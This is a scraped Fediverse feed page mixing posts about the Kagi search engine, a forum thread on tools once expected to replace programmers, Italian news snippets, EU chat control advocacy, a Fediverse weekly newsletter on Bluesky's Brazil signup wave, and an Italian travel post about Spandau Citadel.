And as good as Kagi is, it's still primarily a meta search engine, organizing results from the dominant actors. So it's not like the price is justified by them having to crawl the entire web themselves. Their own crawler, Teclis, is currently small web only and can probably best be described as an interesting project.
Instead of making search cheaper or more affordable, they spend subscription money on creating AI services and various other non-search distractions. Maybe that's good for some people, but I don't want that shit. I just want a good search engine at a justifiable price. And for that, sadly, Kagi fell short.
Mastodon posts tend to get funky when they federate, because Mastodon has this (annoying) norm of starting posts with mentions. So OP mentioned the community on the first line, which became the first part of the title - @fediverse. Second, it mentions Kagi as a tag instead of name, which gives the @kagihq. And then comes the first sentence as the rest of the title.
It's a great example of Lemmy/Mastodon interoperability working, but not being quite there yet.
Mastodon posts tend to get funky when they federate, because Mastodon has this (annoying) norm of starting posts with mentions. So OP mentioned the community on the first line, which became the first part of the title - @Fediverse. Second, it mentions Kagi as a tag instead of name, which gives the @kagihq. And then comes the first sentence as the rest of the title.
I'm not writing from Mastodon, but from Friendica
It's a great example of Lemmy/Mastodon interoperability working, but not being quite there yet.
The mentions problem seems to be only for PieFed, but it doesn't happen with Lemmy
I think it should be reported as an issue to PieFed developers
I can only speak for myself, but I like to keep posted when important people and organizations are opening accounts on the Fediverse. 😀
It's funny that Kagi included "fediverse forums" functionality in their search before they decided to join Mastodon - one would think the search functionality required a bit more.
I pay 5 euros for a VPS at Hetzner and self host my own SearXNG metasearch engine without compromising my privacy. Unlike Kagi, I can search without limits and without the AI stuff that even Kagi has started getting into.
The number of searches i get for the $5 should roll over to the next month if i dont use them all. No way i will be able to convince anyone to switch to this when they will run out of searches every month
@Kagi HQ è l'interessantissimo progetto per un motore di ricerca a pagamento, senza traccianti e con un'accuratezza nell'individuazione dei risultati tale da escludere tutto lo spam di Google.
Chi crede che i costi di #Kagi siano troppo elevati, dovrebbe riflettere su un piccolo dettaglio: se Google lascia fare "gratis" tutte quelle ricerche, chi paga quei costi? La risposta potrebbe sembrare semplice: "gli inserzionisti".
Eppure questa sarebbe una risposta incompleta: come dire che la pioggia è causata dalle nuvole!
In realtà quei costi li pagano gli utenti, facendosi mungere e lasciando che Google estragga il loro "valore", un po' come nella human farm di Matrix...
In ogni caso siamo davvero contenti che un servizio come quello di Kagi, efficace e rispettoso della privacy degli utenti, sia approdato qui nel #Fediverso
Hello, Fediverse! We're Kagi, and we're on a mission to create a friendlier, more human-centric internet that has the users' best interest in mind.
Our core product is a search engine that is ad-free, tracking-free, and fully supported by our users. We've worked hard to deliver a high-quality, fast, and reliable search experience without compromising user privacy: kagi.com/
@MuhammaPy perché non a tutti piace il fatto che DuckDuckGo utilizza, principalmente, i risultati di Bing. Ultimamente sto usando la ricerca di Brave (che pare essere indipendente) e in italiano è migliorata moltissimo.
@MuhammadPython perché onestamente con duckduck go non si riesce a trovare mai una mazza... 😅
Ci sono diversi servizi che integrano motori di ricerca esistenti e in alcuni casi aggiungono un proprio sistema, ma un aspetto importante di Kagi è che le ricerche mostrano davvero quello che hai chiesto. Sembra banale, ma oggi non lo è più tanto perché quando fai una ricerca su un qualsiasi motore di ricerca o carichi una vagonata di letame da cui spulciare quello che ti serve, oppure trovi pochi risultati rilevanti.
@Politica interna, europea e internazionale Maria Rosaria Boccia continua a pubblicare sui social documenti che mettono in imbarazzo il ministro della Cultura Gennaro Sangiuliano. Gli ultimi in ordine di tempo sono un file audio e alcuni screenshot dai quali si
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it In caso di successo, la causa potrebbe obbligare l’Unione a rivedere i suoi obiettivi climatici al 2030: dal 55 al 65% di emissioni in meno L'articolo Gli obiettivi climatici europei? «Inadeguati». E le ong sfidano la Commissione in tribunale proviene da Valori.
@Notizie dall'Italia e dal mondo Alternativa per la Germania vince le elezioni in due importanti Land orientali e minaccia la stabilità politica del paese dove la crisi economica continua a mordere L'articolo Onda nera sulla Germania in crisi proviene da Pagine Esteri.
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it I numeri del calciomercato ci dicono che la bolla è gonfiata dai fondi della City londinese, non certo dai campionati arabi L'articolo Calciomercato: Londra da sola ha speso il triplo dell’Arabia Saudita proviene da Valori.
"1.5 Le case religiose di ospitalità no-profit sono soggette all’obbligo di CIN? No, qualora l’attività di ospitalità sia svolta a titolo meramente gratuito. Le libere donazioni corrisposte dagli ospiti non fanno venir meno la gratuità della prestazione offerta. " ministeroturismo.gov.it/faq-ba… E vabbè
!Programmer Humor Hi, this is a question that popped into my mind when i saw an article about some AWS engineer talking about ai assistants taking over the job of programmers, this reminded me that it's not the first time that something like this was said.
My software engineering teacher once told me that a few years ago people believed graphical tools like enterprise architect would make it so that a single engineer could just draw a pretty UML diagram and generate 90% of the project without touching any code, And further back COBOL was supposed to replace programmers by letting accountants write their own programs.
Now i'm curious, were there many other technologies that were supposedly going to replace programmers that you remember?
i hope someone that's been around much more than me knows something more or has some funny stories to share
It's happened a few times in my career where people tell me I'll be obsolete, but it's always been some company hyping their new product and suits frothing at the prospect of not having to pay me anymore.
So far they're like 0 for 8 or so.
Now I will say the goalposts move. What I'm doing now is for sure not what I was doing 10 years ago. I'm definitely heavier in devops and infra than where I was before (ironic because they said we'd never have to worry about that stuff again if we moved to the cloud). AI is still basically machine learning, just in a while loop, so I've spent time learning that. So, in a way, yes we're obsolete in the sense that if I was the same engineer I was 10 years ago I wouldn't be worth nearly this much, I had to grow and evolve with technology.
some aspects of programming have really been made obsolete
I'd agree that some specifics have been made obsolete. Some habits and routines are currently being ignored or skipped, but the amount of skill that's gone away is very small.
As mentioned before, we downsized brutally after Y2K. The people most affected were the highest-paid who weren't the best code-grinders, and these were the documenters, the programme people, and the mentor types. We lost our guides, our structure, and our historians. We've been growing again like feral children rebuilding society from the wasteland like it's Mad Max, and there's a LOT of the Why that we either don't know, that we ignore, or that we skip in the interests of (insert manufactured urgency here).
We are re-learning some of the whys, but we haven't yet seen the half-assedry chickens come home to roost on that. The symptoms are there: Boeing's Gilligan's Island in Space, supply-chain sploits in waves, personal information lost weekly, all these things that are clipboard hassles we stopped doing that pelrevent massively expensive things later.
Crowdstrike may die now, mainly because they were marauding leopards we allowed to eat our face. Solarwinds before that, same issue but they seem to be okay. There are dozens of ohShit moments that could lead to similarly preventable problems, that we knew not to do ... once.
Well get there again but we'll be rediscovering a lot of what some techbro will claim is obsolete, old-practice, too-cautious, hand-wringing in our neu and moderne go-hard/break-lives paradigm.
I know this is c/programmerhumor but I'll take a stab at the question. If I may broaden the question to include collectively the set of software engineers, programmers, and (from a mainframe era) operators -- but will still use "programmers" for brevity -- then we can find examples of all sorts of other roles being taken over by computers or subsumed as part of a different worker's job description. So it shouldn't really be surprising that the job of programmer would also be partially offloaded.
The classic example of computer-induced obsolescence is the job of typist, where a large organization would employ staff to operate typewriters to convert hand-written memos into typed documents. Helped by the availability of word processors -- no, not the software but a standalone appliance -- and then the personal computer, the expectation moved to where knowledge workers have to type their own documents.
If we look to some of the earliest analog computers, built to compute differential equations such as for weather and flow analysis, a small team of people would be needed to operate and interpret the results for the research staff. But nowadays, researchers are expected to crunch their own numbers, possibly aided by a statistics or data analyst expert, but they're still working in R or Python, as opposed to a dedicated person or team that sets up the analysis program.
In that sense, the job of setting up tasks to run on a computer -- that is, the old definition of "programming" the machine -- has moved to the users. But alleviating the burden on programmers isn't always going to be viewed as obsolescence. Otherwise, we'd say that tab-complete is making human-typing obsolete lol
If a tool were created that properly converted an UML diagram into a project without any need for code, all the programmers that lost their job to this tool would then be hired by the company that offered it, in order to give maintenance and support to everything the customers want in their programs.
It would be removing programmers from they payroll of some companies but they would still be working for them, just further down in the chain.
The same is true for AI. If AI could completely replace programmers in some area, it would need a lot of programmers itself to keep dealing with all the edge cases that would show up from being used everywhere that a programmer was needed before.
The earliest I can think of (from personal experience) is 4GL languages; the early low-code platforms that first started to get traction in the early 80s. They wouldn't have replaced programmers but some thought/hoped they would usher in an age of "low skill" programmers that companies could get away with paying minimum wage to.
So far my experience with ai is it cannot evaluate the quality of the data it uses to any significant degree. As such it can summarize which is convenient for searching and give examples but ultimately you have to correct its mistakes and know enough to do so. There is some savings for a programmer in the sense you might be able to get some rough scaffolding and its a bit eaiser to identify relevant search links but I don't see it replacing developers. It definitely allows one to do more though or even increase the quality. One really great thing it can do is auto commenting of the code which does not need as much improvement as actual code and makes it more likely for you to do the task (both because it does it and because it causes you to go. no don't explain it like that). Is similarly helps with documentation. I doubt it could more than double productivity though. At least as how it stands now. Im not sure it can do much better without becoming general ai.
One really great thing it can do is auto commenting of the code
But then it only comments the 'what', it cannot possibly know the 'why'. I know, some devs disagree on that, but personally, I would rather not have what-comments in my code.
Rational Rose etc. could generate code from UML diagrams, then you "only" needed architects.
In reality it only gave a little help during the design phase, as soon as someone touches the generated code, you have to manually merge changes to UML.
Salesforce advertised “No more developers” for awhile in the mid 2010s. It was great fun trying to clean up the mess all the “not programmers” made of those systems. I really hate Salesforce. They must have some of the best sales people on the planet.
Oracle has a product called Oracle Policy Automation (OPA) that it sells as "you can write the rules in plain English in MS Word documents, you don't need developers". I worked for an insurance organization where the business side bought OPA without consulting IT, hoping they wouldn't have to deal with developers. It totally failed because it doesn't matter that they get to write "plain English" in Word documents. They still lack the structured, formal thinking to deal with anything except the happiest of happy paths.
The important difference between a developer and a non-developer isn't the ability to understand the syntax of a programming language. It's the willingness and ability to formalize and crystallize requirements and think about all the edge cases. As an architect/programmer when I talk to the business side, they get bored and lose interest from all my questions about what they actually want.
can AI replace the job of a real programmer, or a team of software engineers? Probably not for a long time.
can manager abuse the fantasy that they could get rid of those pesky engineers that dare telling them something is impossible? Yes totally. If they believe adding an AI tool to a team justifies a 200% increase in productivity. Some managers will fire people against all metrics and evidence. Calling that move a success. Same occurred when they try to outsource code to cheaper teams.
🔁 L'autorità olandese per la protezione dei dati ha multato Clearview AI di 30 milioni di euro per la "raccolta illegale di dati per il riconoscime...
L'autorità olandese per la protezione dei dati ha multato Clearview AI di 30 milioni di euro per la "raccolta illegale di dati per il riconoscimento facciale"!
Oltre alla multa di 30,5 milioni di euro, commina a Clearview AI una sanzione per inade…
L'autorità olandese per la protezione dei dati ha multato Clearview AI di 30 milioni di euro per la "raccolta illegale di dati per il riconoscimento facciale"!
Oltre alla multa di 30,5 milioni di euro, commina a Clearview AI una sanzione per inade…
Decisione blitz sul #chatcontrol? L'Ungheria vuole far passare i piani senza precedenti dell'UE per la sorveglianza di massa della messaggistica
Domani consultazioni UE sulla sorveglianza della messaggistica, conosciuta come #ChatControl: l'Ungheria…
[quote]Quella dell’importanza crescente dei veicoli a pilotaggio remoto (i cosiddetti droni) nelle operazioni di combattimento è una delle principali lezioni apprese dal conflitto russo-ucraino, non solo nelle loro configurazioni aeree, ma anche in versioni terrestri e soprattutto navali. È infatti in
[quote]Quegli americani che argomentano un vantaggio strutturale degli Usa sulla Cina (chiamati nell’ambiente accademico primacists o denialists) si concentrano spesso sulle frontiere dei due Paesi: mentre gli Usa confinano con due Paesi amici e due oceani, Pechino è al centro di una regione
Pfizer, Microsoft, Palantir, Home Depot, and Lockheed Martin were all shown as "clients" of LobbyMatic. All of them say they haven't worked with the company.
Pfizer, Microsoft, Palantir, Home Depot, and Lockheed Martin were all shown as "clients" of LobbyMatic. All of them say they havenx27;t worked with the company.#LobbyMatic #JacobWohl #AIImages #AI #AILobbying
Pfizer, Microsoft, Palantir, Home Depot, and Lockheed Martin were all shown as "clients" of LobbyMatic. All of them say they haven't worked with the company.
[quote]L’eco della Strategic defence review (Sdr) annunciata dal nuovo primo ministro britannico Keir Starmer è arrivato anche in Italia, sulle ali del Global combat air programme (Gcap). Se Guido Crosetto, ministro della Difesa, e i vertici di Leonardo hanno espresso sicurezza circa la stabilità del
La newsletter di FSFE: il Caso Apple, iFinanziamenti per il Software Libero, YH4F e il Progetto ZOOOM
Supportare il Software Libero in Europa dopo la decisione EU di bloccare i finanziamenti alla #NGI, e la causa di #Apple contro la Commissione Eur…
[quote]L’italiana Leonardo è rimasta l’unica azienda in gara per la commessa, stimata in un miliardo di sterline (1,19 miliardi di euro), per rinnovare la componente ad ala rotante delle Forze armate britanniche. Il ritiro di Airbus e Sikorsky (società del gruppo Lockheed Martin) dalla gara per il programma
As early as tomorrow morning, a majority of EU governments could endorse the controversial draft law on chat control, which had been removed from the agenda in June after massive protests. According to a report by the news service Contexte, the new Hungarian Council Presidency intends to achieve a majority with a small twist, namely removing the searching for unknown material using „artificial intelligence“ (as requested by the Netherlands). The exact details of the Hungarian proposal are kept secret. But the proposal is still to require bulk automated searches in and disclosure of private chats, including end-to-end encrypted chats, that might contain illegal photos or videos. If a user opt out of this “upload moderation” of their chats, they would be blocked from receiving or sending any images, videos and URLs. Signal and Threema have announced they would end their services in the EU if forced to implement the proposed automated monitoring (so-called “client-side scanning”).
Former Pirate Party Member of the European Parliament Patrick Breyer is now calling on EU citizens to turn to their governments: “In June, under massive public pressure, there was a fragile blocking minority to save our digital privacy of correspondence and secure encryption. But now, with no spotlight on government dealings, minimal concessions could tip the scales. Europeans need to understand that they will be cut off from using commonplace secure messengers if chat control is adopted – that means losing touch with your friends and colleagues around the world. Do you really want Europe to become the world leader in bugging our smartphones and requiring blanket surveillance of the chats of millions of law-abiding Europeans?“
Breyer describes the proposal to restrict chat controls to supposedly ‘known’ illegal content as window-dressing: “Regardless of the objective – imagine the postal service simply opened and snooped through every letter without suspicion. It’s inconceivable. Besides, it is precisely the current bulk screening for supposedly known content by Big Tech that exposes thousands of entirely legal private chats, overburdens law enforcement and mass criminalises minors.
The European Parliament is convinced that this Orwellian approach will betray children and victims by inevitably failing in court. It calls for truly effective child protection by mandating security by design, proactive crawling to clean the web and removal of illegal content – none of which is contained in the government proposal on the table now. We have one day to make our governments take a different approach of effective and rights-respecting protection while saving our privacy and security online!”
@Notizie dall'Italia e dal mondo Dopo mesi in attesa del permesso umanitario, l'ong italiana è entrata a Gaza per offrire assistenza sanitaria di base alla popolazione martoriata dalla guerra. Abbiamo intervistato il capomissione Stefano Sozza L'articolo PODCAST. Emergency a Gaza. Stefano Sozza:
@Politica interna, europea e internazionale Il ministro della Cultura Gennaro Sangiuliano rompe il silenzio e scrive una lettera al quotidiano La Stampa in cui assicura che il Ministero non ha mai utilizzato soldi pubblici per rimborsare viaggi a Maria Rosaria
@ nuova versione rilasciata 0.1.0-alpha18! Si tratta principalmente di una bugfix release, che contiene miglioramenti di layout, la visualizzazione della versione con blur delle immagini durante il caricamento, la propagazione degli eventi di aggiornamento di post/utenti tra le schermate, la possibilità di aggiungere un nuovo account direttamente dal bottom sheet di gestione, la distinzione tra cerchie modificabili e predefinite, più una nuova schermata con le informazioni sull'istanza corrente (accessibile dal menu laterale). Nei prossimi giorni: gestione dei messaggi diretti (specifica di Friendica). #friendica#friendicadev#androidapp#androiddev#fediverseapp#opensource#kotlin#kmp#compose #livefasteattrash
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it Negli ultimi anni si sono affermati i litigation funds: anticipano i costi delle class action e, in caso di successo, trattengono parte dei rimborsi L'articolo Litigation funds: i pericolosi rapporti tra finanza e giustizia proviene da Valori.
@Politica interna, europea e internazionale Questo è un appello, anzi una richiesta pressante, una supplica angosciata rivolta ai dirigenti, nazionali e locali, dei partiti della cosiddetta opposizione, e in particolare al Partito democratico. In particolare mi rivolgo alla segretaria Elly Schlein
@Notizie dall'Italia e dal mondo La parlamentare del Fronte popolare, detenuta senza processo da otto mesi, verrebbe tenuta in uno stretto isolamento e sottoposta a gravi restrizioni nonostante le sue precarie condizioni di salute L'articolo
“Ogni mio nuovo lavoro rappresenta la summa e la sintesi di tutti quelli realizzati prima, evolvendone nuovamente il significato e la portata artistica. Credo che “Strategia Esoterica” abbia comunque una forza molto superiore perché frutto di una trasmutazione molto potente”- Deca @Musica Agorà
Deca - Strategia esoterica - “Ogni mio nuovo lavoro rappresenta la summa e la sintesi di tutti quelli realizzati prima, evolvendone nuovamente il significato e la portata artistica.
The organization that runs National Novel Writing Month, a November challenge to write 50,000 words, said "the categorical condemnation of Artificial Intelligence has classist and ableist undertones."#News #AI #nanowrimo
@Notizie dall'Italia e dal mondo Antony Loeweisten, giornalista investigativo australiano, traccia la linea delle relazioni tra l’industria bellica israeliana e molti paesi del mondo. La vendita di armi emerge come priorità impellente per Tel Aviv a dispetto della natura politica dell’acquirente L'articolo
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it La Pibiesse è una tipografia, ma anche un progetto di innovazione sociale che vuole diventare modello per la riqualificazione del territorio L'articolo Pibiesse, la tipografia che guarda al futuro proviene da Valori.
@Notizie dall'Italia e dal mondo Il nuovo articolo di @valori@poliversity.it Bruxelles etichetta come “investimenti verdi” aerei e navi inquinanti: una coalizione di ong la trascina in tribunale L'articolo Aerei e navi nella tassonomia europea: Bruxelles dovrà risponderne in tribunale proviene da Valori.
Bluesky experiences a massive new wave of signups from Brazil, Premium feeds with sub.club, and much more. [share author='Laurens Hof' profile='https://fediversereport.com/author/laurenshof/' avatar='https://poliverso.org/photo/206608119366e42c304ffac007248590-5.jpeg?ts=1734620326' link='https://fediversereport.com/last-week-in-fediverse-ep-82/' posted='2024-09-01 18:04:28' guid='08552256-1db60dc7714646e3-cb23b587' message_id='https://fediversereport.com/last-week-in-fediverse-ep-82/']Last Week in Fediverse – ep 82
1 million new accounts on Bluesky as Brazil bans X, and premium feeds with Sub.club, and much much more.
Brazil bans X, and a signup wave to Bluesky
The Brazilian supreme court has banned the use of X in an ongoing legal fight with Elon Musk. The ban follows after a long trajectory of legal issues between the Brazilian government and Musk’s X. In April 2024, the Brazilian court ordered X to block certain X accounts that were allegedly related to the 2023 coup attempt, which Musk refused to do. In that same time period, President Luiz Inácio Lula da Silva opened an account on Bluesky, and there was already an inflow of a Brazilian community into Bluesky. Now, the legal fight has further escalated over X’s refusal to appoint a legal representative in the country, and Musk’s continuing refusal to comply with Brazil’s laws and regulation has resulted in the supreme court banning the use of X in the country altogether.
The ban on X has caused a massive signup wave to Bluesky, with over 1 million new accounts created in just three days, of which the large majority are from Brazil. The user statistics shot up even more than that, suggesting that there are a lot of people with an existing account logging back in as well.
The new inflow of people to Bluesky is having some significant effects on the network, as well as on the state of decentralised social networks more broadly:
President Lula is putting actual focus on Bluesky. In one of his final posts on X, Luala listed in non-alphabetical order all other platforms that he is active on, and placed Bluesky at the top of the list. Posts by Lula that are placed on Bluesky (134k followers) as well as on Threads (2.4m followers) get more than 5 times as much likes on Bluesky. Today, Lula explicitly asked people on Bluesky what they thought about the platform, in a post that got over 30k likes and counting. It is hard to imagine that the Brazilian government is not paying attention to this all, and is looking which platform(s) the Brazilian community is moving towards in the wake of the ban on X.
Brazilians are a very active community on the internet (see Orkut), and bring with them their own unique culture to Bluesky. The current decentralised social networks are heavily focused on US politics, judged by top posts on both Mastodon and Bluesky, and beyond shitposts and memes there is surprisingly little space for mainstream pop culture and sports. The Brazilian community does seem to bring a large number of pop culture and sports to Bluesky, significantly diversifying the topics of discussion, and in turn, creating more space for other people who are interested in that in the future. The activity of Brazilians on microblogging can also be seen in the like counts on popular posts of Bluesky: before this week, the most popular posts of any given day usually got around 3k likes, this has sprung up to 30k to 50k likes. Brazilians are so chatty in fact, that currently 81% of the posts on the network are in Portugese, and the amount of accounts of people who post on a given day has gone up from a third to over 50%.
The Bluesky engineers have build a very robust infrastructure system, and the platform has largely cruised along fine without issues, even when faced with a 15x increase in traffic. This all without having to add any new servers. For third party developers, such as the Skyfeed developer, this increase in traffic did came with downtime and more hardware requirements however. It shows the complications of engineering an open system, while the Bluesky team itself was prepared with their core infrastructure, third party infrastructure, on which a large number of custom feeds rely, was significantly less prepared for the massive increase in traffic.
In contrast, the ban on X in Brazil has made little impact on Mastodon, with 3.5k new signups from Brazil on Mastodon.social. I’d estimate that this week has seen 10k new accounts above average, with 15k new accounts the previous week and 25k in this week. That places Mastodon two orders of magnitude behind Bluesky in signups from Brazil. There are a variety of reasons for this, which deserve their own analysis, this newsletter is long enough as it is. One thing I do want to point out is within fediverse community there are two sub communities that each have their own goals and ideas about the fediverse and growth. Some people responded with the news that most Brazilians went to Bluesky with type of response that indicated that they appreciate the small, quiet and cozy community that the fediverse currently provides, and a distrust of the growth-at-all-costs model for social networks. For other people however, their goal of the fediverse is to build a global network that everyone is a part of and everyone uses (‘Big Fedi’), a view of the fediverse that is also represented in the latest episode of the Waveform podcast (see news below). And if the goal is to build ActivityPub into the default protocol for the social web, it is worth paying attention to what is happening right now in the Brazilian ATmosphere.
The News
Sub.club is a new way to monetise feeds on the fediverse, with the goal of bringing the creator economy to the fediverse. It gives people the ability to create premium feeds that people can only access via a subscription. People can follow this feed from any Mastodon account (work on other fediverse platforms is ongoing). Sub.club handles the payment processes and infrastructure, for which they charge 6% of the subscription fee (compared to 8-12% Patreon charges). Sub.club also makes it possible for other apps to integrate, both IceCubes and Mammoth have this option. Bart Decrem, who is one of the people behind Sub.club, is also the co-founder of the Mastodon app Mammoth. Sub.club also explicitly positions itself as a way for server admins to fund their server. Most server admins rely on donations by their users, often via services like Patreon, Ko-fi, Open Collective or other third party options. By integration payments directly into the fediverse, Sub.club hopes that the barrier for donations will be lower, and more server admins can be financially sustainable.
Newsmast has build a new version of groups software for the fediverse, and the first group is dedicated to the Harris campaign. There are few types of groups available that integrate with Mastodon, such as with Friendica or a.gup.pe. These groups function virtually identical to hashtags, by boosting out posts where the group account is tagged in to everyone who follows the group account. As there is no moderation in these types of group accounts, it allows anyone to hijack the group account. A group account dedicated to a political campaign is especially vulnerable to this. On Mastodon a volunteer Harris Campaign group used a Friendica group for campaign organising, but the limited moderation tools (blocking a user from following the group) that are available are not working, which allowed blocked users to still get their posts boosted by the group account. Newsmast’s version of Groups gives (working) moderation tools, and only boosts top level comments and not replies, to cut down on the noise. For now, the new Group is only available to the Harris Campaign group for testing, but it will come later to Mastodon servers that run the upcoming Patchwork plugin.
Bluesky added quite a number of new anti-toxicity features in their most recent app update. Bluesky has added quote posting controls, allowing people to set on a per-post basis if people can quote the post or not. There is also the option to remove quotes after the fact as well: if you’ve allowed quote posts on a post you’ve made, but someone made a quote post that you do not feel comfortable with, you have the possibility to detach your post. Another update is the possibility to hide replies on your posts. Bluesky already hides comments under a ‘show more’ button if the comment is labeled by a labeler you subscribe to. You now have the option to do so on all comments that are made on your posts, and the hidden comment will be hidden for everyone. Finally, Bluesky has changed how replies are shown in the Following feed, which is an active subject of discussion. I appreciate the comments made by Bluesky engineer Dan Abramov here, who notes there are two different ways of using Bluesky, who each prioritise comments in conflicting ways. As new communities grow on Bluesky, prioritising their (conflicting) needs becomes more difficult, and I’m curious to see how this further plays out.
The WVFRM (Waveform) podcast of popular tech YouTuber MKBHD has a special show about the fediverse, ‘Protocol Wars – The Fediverse Explained!’. It is partially a discussion podcast, partial explainer, and partial interview with many people within the community. They talk with Mastodon’s Eugen Rochko, Bluesky’s Jay Graber, Threads’s Adam Mosseri, and quite some more people. It is worth noting for a variety of reason. The show is quite a good introduction, that talks to many of the most relevant names within the community. MKBHD is one of the biggest names in the tech creator scene, and many people are paying attention to what he and his team is talking about. Furthermore, I found the framing as ‘protocol wars’ interesting, as the popularity of Bluesky in Brazil as an X replacement indicates that there is indeed a race between platforms to be build on top of the new dominant protocol.
Darnell Clayton has a very interesting blog post, in which he discovers that there is a discrepancy in follower count for Threads accounts that have turned on fediverse sharing. Clayton notes that the follower count shown in the Threads app is lower than the one shown in a fediverse client, for both Mastodon and Flipboard. He speculates that this difference is the number of fediverse accounts that follow a Threads account. It should be noted that this is speculation and has not been confirmed, but if this is true, it would give us a helpful indication of how many fediverse accounts are using the connection with Threads. While we’re talking about Threads accounts, Mastodon CEO Eugen Rochko confirmed that the mastodon.social server has made a connection with 15.269 Threads accounts who have turned on fediverse sharing.
Ghost’s latest update on their work on implementing ActivityPub: “With this milestone, Ghost is for the first time exceeding the functionality of a basic RSS reader. This is 2-way interaction. You publish, and your readers can respond.”
Dhaaga is a multiplatform fediverse client that adds unique client-side functionalities.
Lotide, a experimental link-aggregator fediverse platform, ceases development.
A custom QR code generator, which some pretty examples of custom QR codes for your fediverse profile.
Custom decentralised badges on atproto with badges.blue, a new work in process by the create of atproto event planner Smoke Signal.
Ieri avevo in programma un giro per negozi di biciclette per vedere e provare un po' di bici elettriche. Uno di questi si trova a Spandau, che rispetto a casa mia è inculatissima (un'ora di viaggio minimo) per cui ho unito l'utile al dilettevole e con l'occasione sono stata anche a visitare la Cittadella.
Vista dalla Juiliusturm (1230), dicono il più antico edificio preservato di Berlino.
Questa scelta mi ha innanzitutto regalato la conoscenza degli Heilung, band che pesta tantissimo e che suonava la sera stessa proprio nella Cittadella. I tecnici che ne facevano il soundcheck mentre io gironzolavo me li hanno fatti apprezzare. Se amate la musica che pesta tantissimo date loro un orecchio, secondo me possono messere d'accordo gente dai gusti diversi (purché pestino! L'ho detto che pestanopestanopestano?).
Poi va detto che il biglietto di ingresso a 4,50 € stracciati dà accesso a tutti e sei i musei presenti nel complesso, piccoli, diversi, ma tutti meritevoli. Ho saltato solo il Centro d'Arte Contemporanea perché chiuso per allestimento di una mostra.
Prima fermata: la "finestra archeologica"
Qui sono conservati gli scavi archeologici che hanno portato alla luce le tre fasi costruttive della fortificazione. Dal XIII al XVI secolo si vede l'evoluzione dalla prima palizzata in legno, alle mura in pietra medievali, al castello in stile rinascimentale e mattoni rossi oggi visibile. Vengono spiegati anche dettagli ingegneristici, tipo che per costruire i bastionazzi così come sono oggi hanno "sbrodolato" fuori dai confini dell'isoletta su cui era sorto il nucleo originario. Per costruire in acqua hanno praticamente fatto una fitta base di "denti" di legno su cui poi è stata costruita la struttura attuale. Che non sia sprofondato tutto per me ha del miracoloso.
Seconda fermata: il museo civico di Spandau
Qui sono esposti reperti della storia di Spandau: dalle repliche dei documenti ufficiali, agli oggetti di uso comune, al prodotto dell'industria qui storicamente stanziata, al (ovviamente) nazionalsocialismo, alla divisione.
Questi sono giocattoli, che già di per sé mi fa rabbrividire. Alle stuatuine di Hitler e Göring si può alzare il braccino per fargli fare il saluto nazista. Ha un sapore distopico, invece è successo davvero: dei bambini hanno giocato con 'sta roba.
Gironzolando qui ho scoperto che parte di Metropolis è stata girata a Spandau (pensavo solo ai Babelstudios, e invece) e c'è un memoriale di una persona che ha partecipato alla produzione che vorrò leggere per intero. Amo Metropolis!
Terza fermata: la sala d'armi (o come diavolo vogliamo tradurre Exerzierhalle)
Qui sono conservati cannoni. Decine e decine di cannoni. Il più vecchio è del primo '400, il più giovane risale alla Prima Guerra Mondiale.
Immaginate di stare accovacciati qui dietro a sparare al "nemico".
La sala è chiusa e, con il caldo, dentro ristagna un odore che ricorda un'officina meccanica, ma con un "twist" tutto suo. Il mio cervello lo ha etichettato come "odore di guerra", ma non penso che sul campo la puzza fosse quella (o almeno non soltanto quella). Toccacciando in giro (perché qui è concesso mettere le mani sugli artefatti) ho poi constato come ci sia stata un'epoca, tra '600 e '700, in cui usava mettere motti vari sui cannoni. Questo qua mi ha colpita di più:
Dice:"Saturnus frist (!) die Kind allein ich fress sie aller gros (!) und klein" (grossomodo: "Saturno mangia solo i bambini, io mangio tutti, grandi e piccini". Che detto da un cannone ci sta).
Quarta tappa: il deposito provvigioni
Questo è un edificio del periodo rinascimentale, in parte ricostruito, oggi adibito a galleria che preserva una serie di monumenti scultorei precedentemente sparsi per Berlino dal XVIII al XX secolo. Praticamente un consesso di figure rilevanti per la storia della città (e non solo). Alla fine c'è anche lui: il capoccione di Lenin!
Avete presente il megaprogetto di Hitler per la trasformazione di Berlino nella "Welthauptstadt Germania"? Come doveva diventare una città monumentale, con al centro un ipermega edificio celebrativo? Ecco. Questo plastico rende l'idea di quanto megalomane fosse il progetto di quell'edificio: quella cosina a destra è la porta di Brandeburgo, in scala.
Quinta tappa: la casa del comandante
L'ho vista per ultima, ma, essendo sopra la biglietteria, in realtà si potrebbe vedere anche come prima cosa. Qui sono conservati reperti e documenti della storia della Cittadella, altri dettagli sulle fasi costruttive, ma anche flora e fauna del luogo.
Che dire alla fine di tutto questo? Ma niente, solo che ogni volta che sfioro la storia di questa città il brivido lungo la schiena è assicurato. Qua sono successe cose folli.
(Oh, le bici in tutto questo le ho provate eh. Ho due candidate tra cui decidere).
viking
in reply to Cybersecurity & cyberwarfare • • •I've tested kagi and agree that the search results are great. What I don't like is that it's making anonymous searching impossible, since I have to be logged in to use it (or use my unique token as part of the url for mobile searches).
Ultimately this means to me that in a private window mode (or even logged out with a fingerprinting resistant browser) I do not have the same degree of anonymity I enjoy even when using Google, let alone DDG or others.
I like the idea of not being dependent on google, but exposing my entire search history to one single entity is not my answer of choice.
Cybersecurity & cyberwarfare likes this.
Cybersecurity & cyberwarfare reshared this.
Cybersecurity & cyberwarfare
in reply to viking • •@viking you are right: this is a serious criticality. However, Kagi aims to provide an optimal search service, but it is not focused on anonymity.
From that point of view, Brave's search engine is much better, which has improved a lot
Blaze (he/him)
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.
cabbage
in reply to Cybersecurity & cyberwarfare • • •I subscribed to the lower tier for a while, but I kept running out of searches early on every month, and the price of the higher tier is just not excusable. So I found myself adding the !ddg bang most of the time to avoid spending my Kagi quota.
And as good as Kagi is, it's still primarily a meta search engine, organizing results from the dominant actors. So it's not like the price is justified by them having to crawl the entire web themselves. Their own crawler, Teclis, is currently small web only and can probably best be described as an interesting project.
Instead of making search cheaper or more affordable, they spend subscription money on creating AI services and various other non-search distractions. Maybe that's good for some people, but I don't want that shit. I just want a good search engine at a justifiable price. And for that, sadly, Kagi fell short.
Teclis - Non-commercial Web Search
teclis.comCybersecurity & cyberwarfare likes this.
rglullis
in reply to Cybersecurity & cyberwarfare • • •Cybersecurity & cyberwarfare likes this.
